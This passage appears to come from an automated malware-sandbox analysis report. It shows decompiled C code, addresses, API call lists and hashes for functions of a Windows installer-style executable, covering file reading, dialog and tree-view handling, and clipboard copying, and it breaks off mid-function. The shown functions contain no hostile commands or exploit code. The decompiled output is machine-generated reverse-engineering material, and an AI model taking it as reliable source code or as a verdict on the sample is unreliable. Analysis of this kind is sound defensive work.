                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: a6786bdd1ecadf4d2098af02dba405870ce5b222e9fe0f941bd3e831565b58f7
                                                                      • Instruction ID: b7b74c543409fdeb8301fbc9ebf3be8aa86158980b04ac487dfcd649bd9e914c
                                                                      • Opcode Fuzzy Hash: a6786bdd1ecadf4d2098af02dba405870ce5b222e9fe0f941bd3e831565b58f7
                                                                      • Instruction Fuzzy Hash: E6D09E71658301EFEF098F20DE16F2EBBA2EB84B01F10962CBA52940E0D6715C15DB16
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004030E0, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004030E0(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                      0x004030e4
                                                                      0x004030f7
                                                                      0x004030ff
                                                                      0x00000000
                                                                      0x00403106
                                                                      0x00000000
                                                                      0x00403108

                                                                      APIs
                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F03,000000FF,00000004,00000000,00000000,00000000), ref: 004030F7
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 97d6d247004f29e9d78521b63fa2a9ba5f4855e938e88fb08e6db57a9883ace6
                                                                      • Instruction ID: e963f8e1892cb687997461210a543dd6021012ac376dcca7a2fa4431a532cc29
                                                                      • Opcode Fuzzy Hash: 97d6d247004f29e9d78521b63fa2a9ba5f4855e938e88fb08e6db57a9883ace6
                                                                      • Instruction Fuzzy Hash: D4E0EC32554129BBDF115FA19C04EAB3F6CEB097A2F00C032FA55E9290D275EA11DBA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403112, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00403112(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}




                                                                      0x00403120
                                                                      0x00403126

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E3B,?,?,?,?,?,?,?,004032C5,?), ref: 00403120
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                      • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                                                      • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                      • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403509, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00403509() {
				void* _t1;
				void* _t4;
				signed int _t6;

				_t1 =  *0x409020; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409020 =  *0x409020 | 0xffffffff;
					_t6 =  *0x409020;
				}
				return E004052DC(_t4, _t6, 0x436800, 7);
			}






                                                                      0x00403509
                                                                      0x00403511
                                                                      0x00403514
                                                                      0x0040351a
                                                                      0x0040351a
                                                                      0x0040351a
                                                                      0x0040352d

                                                                      APIs
                                                                      • CloseHandle.KERNEL32(FFFFFFFF,00403333,?), ref: 00403514
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 011c69f3543b3670a0a5f0c1309755843e10ba62a0cb865796c18c35e759391d
                                                                      • Instruction ID: 515abea7777c0a29096e9a6c7b2f3eff04a411698ae5f4ec9479bb3011aad0a9
                                                                      • Opcode Fuzzy Hash: 011c69f3543b3670a0a5f0c1309755843e10ba62a0cb865796c18c35e759391d
                                                                      • Instruction Fuzzy Hash: 92C08C30D08B01BAC518AB789E4AB1A3AB4BB09331FA00B65F0B1F01F1C77C5D01C92E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 004046B8, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E004046B8(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42f048;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x42f028 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x42f031 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404638(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x42f030) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42a464;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42a47c;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42a464 = _t315;
								 *0x42a47c = _t315;
								 *0x42f080 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x42f031 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E00401410(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42a47c;
									_t196 =  *0x42f048;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x42f04c <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42e7fc + 0x10)) != _t315) {
											E00404556(0x3ff, 0xfffffffb, E0040460B(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x42f04c);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42a47c);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x42f080 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42a47c = GlobalAlloc(0x40,  *0x42f04c << 2);
					_t250 = LoadBitmapA( *0x42f020, 0x6e);
					 *0x42a470 =  *0x42a470 | 0xffffffff;
					_v24 = _t250;
					 *0x42a478 = SetWindowLongA(_v8, 0xfffffffc, E00404CB9);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a464 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42a464);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059C6(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403DAF(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403DAF(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x42f04c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42a47c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42a47c + _t318 * 4) = _t274;
									_t288 =  *( *0x42a47c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x42f04c);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DE4(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DE4(_v12);
								L89:
								return E00403E16(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}



























































                                                                      0x004046d6
                                                                      0x004046dc
                                                                      0x004046de
                                                                      0x004046e4
                                                                      0x004046ea
                                                                      0x004046f7
                                                                      0x00404700
                                                                      0x00404703
                                                                      0x00404706
                                                                      0x0040492e
                                                                      0x00404935
                                                                      0x00404949
                                                                      0x00404937
                                                                      0x00404939
                                                                      0x0040493c
                                                                      0x0040493d
                                                                      0x00404944
                                                                      0x00404944
                                                                      0x00404955
                                                                      0x00404963
                                                                      0x00404966
                                                                      0x0040497c
                                                                      0x004049f4
                                                                      0x004049f7
                                                                      0x004049f9
                                                                      0x00404a03
                                                                      0x00404a11
                                                                      0x00404a11
                                                                      0x00404a13
                                                                      0x00404a1d
                                                                      0x00404a23
                                                                      0x00404a44
                                                                      0x00404a25
                                                                      0x00404a32
                                                                      0x00404a32
                                                                      0x00404a23
                                                                      0x00404a1d
                                                                      0x00000000
                                                                      0x004049f7
                                                                      0x00404981
                                                                      0x0040498c
                                                                      0x00404991
                                                                      0x00404998
                                                                      0x0040499f
                                                                      0x004049a9
                                                                      0x004049a9
                                                                      0x004049ad
                                                                      0x004049b2
                                                                      0x004049b7
                                                                      0x004049cd
                                                                      0x004049b9
                                                                      0x004049b9
                                                                      0x004049c1
                                                                      0x004049c8
                                                                      0x004049c3
                                                                      0x004049c3
                                                                      0x004049c3
                                                                      0x004049c1
                                                                      0x004049d1
                                                                      0x004049d3
                                                                      0x004049e1
                                                                      0x004049e2
                                                                      0x004049ee
                                                                      0x004049f1
                                                                      0x004049f1
                                                                      0x004049b2
                                                                      0x00000000
                                                                      0x0040499f
                                                                      0x00404983
                                                                      0x0040498a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404a47
                                                                      0x00404a47
                                                                      0x00404a4e
                                                                      0x00404ac2
                                                                      0x00404ac9
                                                                      0x00404ad5
                                                                      0x00404ad5
                                                                      0x00404ade
                                                                      0x00404ae0
                                                                      0x00404ae7
                                                                      0x00404aea
                                                                      0x00404aea
                                                                      0x00404af0
                                                                      0x00404af7
                                                                      0x00404afa
                                                                      0x00404afa
                                                                      0x00404b00
                                                                      0x00404b06
                                                                      0x00404b0c
                                                                      0x00404b0c
                                                                      0x00404b19
                                                                      0x00404c66
                                                                      0x00404c6d
                                                                      0x00404c8a
                                                                      0x00404c90
                                                                      0x00404ca2
                                                                      0x00404ca2
                                                                      0x00000000
                                                                      0x00404b1f
                                                                      0x00404b21
                                                                      0x00404b29
                                                                      0x00404b2d
                                                                      0x00404b2d
                                                                      0x00404b35
                                                                      0x00404b76
                                                                      0x00404b78
                                                                      0x00404b88
                                                                      0x00404b8b
                                                                      0x00404b90
                                                                      0x00404b97
                                                                      0x00404b9a
                                                                      0x00404c3c
                                                                      0x00404c42
                                                                      0x00404c50
                                                                      0x00404c61
                                                                      0x00404c61
                                                                      0x00000000
                                                                      0x00404c50
                                                                      0x00404ba0
                                                                      0x00404ba3
                                                                      0x00404ba9
                                                                      0x00404bae
                                                                      0x00404bb0
                                                                      0x00404bb2
                                                                      0x00404bb8
                                                                      0x00404bbf
                                                                      0x00404bc4
                                                                      0x00404bcb
                                                                      0x00404bce
                                                                      0x00404bce
                                                                      0x00404bd5
                                                                      0x00404be1
                                                                      0x00404be5
                                                                      0x00404be7
                                                                      0x00404be7
                                                                      0x00404bd7
                                                                      0x00404bd9
                                                                      0x00404bd9
                                                                      0x00404c07
                                                                      0x00404c13
                                                                      0x00404c22
                                                                      0x00404c22
                                                                      0x00404c24
                                                                      0x00404c27
                                                                      0x00404c30
                                                                      0x00000000
                                                                      0x00404b37
                                                                      0x00404b42
                                                                      0x00404b45
                                                                      0x00404b4a
                                                                      0x00404b4c
                                                                      0x00404b50
                                                                      0x00404b60
                                                                      0x00404b6a
                                                                      0x00404b6c
                                                                      0x00404b6f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404b52
                                                                      0x00404b52
                                                                      0x00404b58
                                                                      0x00404b5a
                                                                      0x00404b5a
                                                                      0x00404b5b
                                                                      0x00404b5c
                                                                      0x00000000
                                                                      0x00404b52
                                                                      0x00404b35
                                                                      0x00404b19
                                                                      0x00404a56
                                                                      0x00000000
                                                                      0x00404a6c
                                                                      0x00404a76
                                                                      0x00404a7b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404a8d
                                                                      0x00404a92
                                                                      0x00404a9e
                                                                      0x00404a9e
                                                                      0x00404aa0
                                                                      0x00404aaf
                                                                      0x00404ab1
                                                                      0x00404ab8
                                                                      0x00404abb
                                                                      0x00000000
                                                                      0x00404abb
                                                                      0x00404a56
                                                                      0x0040470c
                                                                      0x00404711
                                                                      0x0040471b
                                                                      0x0040471c
                                                                      0x00404725
                                                                      0x00404730
                                                                      0x0040473b
                                                                      0x00404741
                                                                      0x0040474f
                                                                      0x00404764
                                                                      0x00404769
                                                                      0x00404774
                                                                      0x0040477d
                                                                      0x00404792
                                                                      0x004047a3
                                                                      0x004047b0
                                                                      0x004047b0
                                                                      0x004047b5
                                                                      0x004047bb
                                                                      0x004047bd
                                                                      0x004047c0
                                                                      0x004047c5
                                                                      0x004047ca
                                                                      0x004047cc
                                                                      0x004047cc
                                                                      0x004047cf
                                                                      0x004047d0
                                                                      0x004047ec
                                                                      0x004047ec
                                                                      0x004047ee
                                                                      0x004047ef
                                                                      0x004047f4
                                                                      0x004047f7
                                                                      0x004047fa
                                                                      0x004047fe
                                                                      0x00404803
                                                                      0x00404808
                                                                      0x0040480c
                                                                      0x00404811
                                                                      0x00404816
                                                                      0x00404818
                                                                      0x00404820
                                                                      0x004048ea
                                                                      0x004048fd
                                                                      0x00000000
                                                                      0x00404826
                                                                      0x00404829
                                                                      0x0040482c
                                                                      0x0040482f
                                                                      0x0040482f
                                                                      0x00404835
                                                                      0x0040483b
                                                                      0x0040483e
                                                                      0x00404844
                                                                      0x00404845
                                                                      0x0040484a
                                                                      0x00404853
                                                                      0x0040485a
                                                                      0x0040485d
                                                                      0x00404860
                                                                      0x00404863
                                                                      0x0040489f
                                                                      0x004048c8
                                                                      0x004048a1
                                                                      0x004048ae
                                                                      0x004048ae
                                                                      0x00404865
                                                                      0x00404868
                                                                      0x00404877
                                                                      0x00404881
                                                                      0x00404889
                                                                      0x00404890
                                                                      0x00404898
                                                                      0x00404898
                                                                      0x00404863
                                                                      0x004048ce
                                                                      0x004048cf
                                                                      0x004048db
                                                                      0x004048db
                                                                      0x004048e8
                                                                      0x00404903
                                                                      0x00404907
                                                                      0x00404924
                                                                      0x00404929
                                                                      0x0040492c
                                                                      0x00000000
                                                                      0x00404909
                                                                      0x0040490e
                                                                      0x00404917
                                                                      0x00404ca4
                                                                      0x00404cb6
                                                                      0x00404cb6
                                                                      0x00404907
                                                                      0x00000000
                                                                      0x004048e8
                                                                      0x00404820

                                                                      APIs
                                                                      • GetDlgItem.USER32 ref: 004046CF
                                                                      • GetDlgItem.USER32 ref: 004046DC
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404728
                                                                      • LoadBitmapA.USER32 ref: 0040473B
                                                                      • SetWindowLongA.USER32 ref: 00404755
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404769
                                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 0040477D
                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404792
                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 0040479E
                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004047B0
                                                                      • DeleteObject.GDI32(?), ref: 004047B5
                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047E0
                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047EC
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404881
                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004048AC
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048C0
                                                                      • GetWindowLongA.USER32 ref: 004048EF
                                                                      • SetWindowLongA.USER32 ref: 004048FD
                                                                      • ShowWindow.USER32(?,00000005), ref: 0040490E
                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A11
                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A76
                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A8B
                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404AAF
                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404AD5
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404AEA
                                                                      • GlobalFree.KERNEL32 ref: 00404AFA
                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B6A
                                                                      • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404C13
                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C22
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C42
                                                                      • ShowWindow.USER32(?,00000000), ref: 00404C90
                                                                      • GetDlgItem.USER32 ref: 00404C9B
                                                                      • ShowWindow.USER32(00000000), ref: 00404CA2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: 3d3a012deb5f043ffbbd430d6f659e7630f4d256b0a42b3255d05ae8089c2352
                                                                      • Instruction ID: d257be92f5ecdef9f5564086e86d6f95aaddda39fc654f176e6354e63e2cf52a
                                                                      • Opcode Fuzzy Hash: 3d3a012deb5f043ffbbd430d6f659e7630f4d256b0a42b3255d05ae8089c2352
                                                                      • Instruction Fuzzy Hash: EB0290B0E00208EFDB24DF65DD45AAE7BB5EB84314F10817AF610BA2E1C7799A51CF58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404EA7, Relevance: 54.3, APIs: 36, Instructions: 277windowclipboardmemoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E00404EA7(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t86;
				long _t87;
				struct HMENU__* _t89;
				unsigned int _t92;
				int _t94;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t148;
				int _t149;
				long _t153;
				struct HWND__* _t157;
				struct HMENU__* _t159;
				long _t161;
				void* _t162;
				short* _t163;

				_t153 = _a8;
				_t148 = 0;
				_v8 =  *0x42e804;
				if(_t153 != 0x110) {
					if(_t153 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E3B, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					if(_t153 != 0x111) {
						L16:
						if(_t153 != 0x404) {
							L24:
							if(_t153 != 0x7b) {
								goto L19;
							}
							_t86 = _v8;
							if(_a12 != _t86) {
								goto L19;
							}
							_t87 = SendMessageA(_t86, 0x1004, _t148, _t148);
							_a12 = _t87;
							if(_t87 <= _t148) {
								L36:
								return 0;
							}
							_t89 = CreatePopupMenu();
							_push(0xffffffe1);
							_push(_t148);
							_t159 = _t89;
							AppendMenuA(_t159, _t148, 1, E004059C6(_t148, _t153, _t159));
							_t92 = _a16;
							if(_t92 != 0xffffffff) {
								_t149 = _t92;
								_t94 = _t92 >> 0x10;
							} else {
								GetWindowRect(_v8,  &_v24);
								_t149 = _v24.left;
								_t94 = _v24.top;
							}
							if(TrackPopupMenu(_t159, 0x180, _t149, _t94, _t148, _a4, _t148) == 1) {
								_t161 = 1;
								_v56 = _t148;
								_v44 = 0x42a488;
								_v40 = 0xfff;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
								} while (_a4 != _t148);
								OpenClipboard(_t148);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t161);
								_a4 = _t101;
								_t162 = GlobalLock(_t101);
								do {
									_v44 = _t162;
